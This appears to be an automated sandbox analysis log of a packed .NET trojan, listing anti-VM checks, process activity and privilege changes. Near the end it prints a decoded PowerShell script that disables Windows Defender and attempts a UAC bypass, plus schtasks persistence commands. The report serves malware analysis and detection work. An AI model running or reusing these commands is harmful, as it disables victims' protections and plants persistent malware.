Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Client.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Infected.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Loaader.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Client.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599524
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598826
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598704
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598556
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598433
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598323
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598090
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597745
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597320
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596948
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596844
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596604
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596270
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596141
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 596015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595684
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 595563
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99866
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99745
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99628
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99500
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99389
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99280
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99171
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99062
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98937
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99953
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99793
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99647
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99484
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99343
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99210
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98874
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 593075
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592785
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592635
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592507
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592367
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592249
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592141
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 592031
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 591922
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 591789
Source: C:\Users\user\AppData\Roaming\Loaader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Loaader.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98978
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98830
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98672
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99887
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99781
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99521
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99406
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 97828
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 97670
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 97551
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 97316
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99859
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99746
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99640
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99421
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99203
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99079
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98906
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98750
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99936
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99742
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99561
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99319
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99180
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99060
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98943
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98804
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 591993
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99876
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599877
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599738
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599612
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599476
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599360
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 599110
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598845
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 598704
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99871
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99755
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99633
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99516
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99401
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99285
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99168
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99053
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99931
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99815
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99684
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99564
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99435
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99314
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99193
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99062
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98958
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98706
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98573
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98459
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99960
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99708
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99591
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99469
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99351
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99236
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99105
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 98872
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99901
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99753
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Thread delayed: delay time: 99615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.30.dr Binary or memory string: VMware
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.30.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.30.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.30.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.30.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.30.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2728713253.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000014.00000002.2747981173.000000001B573000.00000004.00000020.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3526000868.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003477000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003489000.00000004.00000800.00020000.00000000.sdmp, Info.txt.21.dr Binary or memory string: VirtualMachine: False
Source: Amcache.hve.30.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VirtualMachine:
Source: Amcache.hve.30.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: WinDefend.exe, 0000001F.00000002.3250841388.0000000000E52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: Amcache.hve.30.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: WinDefend.exe, 00000004.00000002.3251120364.0000000001167000.00000004.00000020.00020000.00000000.sdmp, WinDefend.exe, 00000016.00000002.3250933723.0000000001203000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000019.00000002.2255759689.0000015CBE79E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: A2e$ConvertByrefToPtrVen_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRo
Source: Amcache.hve.30.dr Binary or memory string: vmci.sys
Source: Amcache.hve.30.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.30.dr Binary or memory string: vmci.syshbin`
Source: Loaader.exe.3.dr Binary or memory string: vmware
Source: Amcache.hve.30.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.30.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.30.dr Binary or memory string: VMware20,1
Source: Infected.exe, 00000003.00000002.2047247573.000000001AD7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91ef
Source: Amcache.hve.30.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.30.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.30.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.30.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.30.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.30.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\Loader.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Loader.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loader.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Client.exe.0.dr, Keylogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: Client.exe.0.dr, DInvokeCore.cs Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: Client.exe.0.dr, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: Base64 decoded @(echo off%)[1]sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1$notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}$ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')$bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition$u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}$r=[char]13; $nfo=[char]39+$r+' (\ /)'+$r+'( * . * ) A limited account protects you from UAC exploits'+$r+' ```'+$r+[char]39$script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'$script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$scriptif ($u -eq 0) { start powershell -args $script -verb runas -win 1; break}if ($u -eq 1) { if ($flaw.
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Client.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Infected.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <base64-encoded command omitted>
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe Process created: unknown unknown
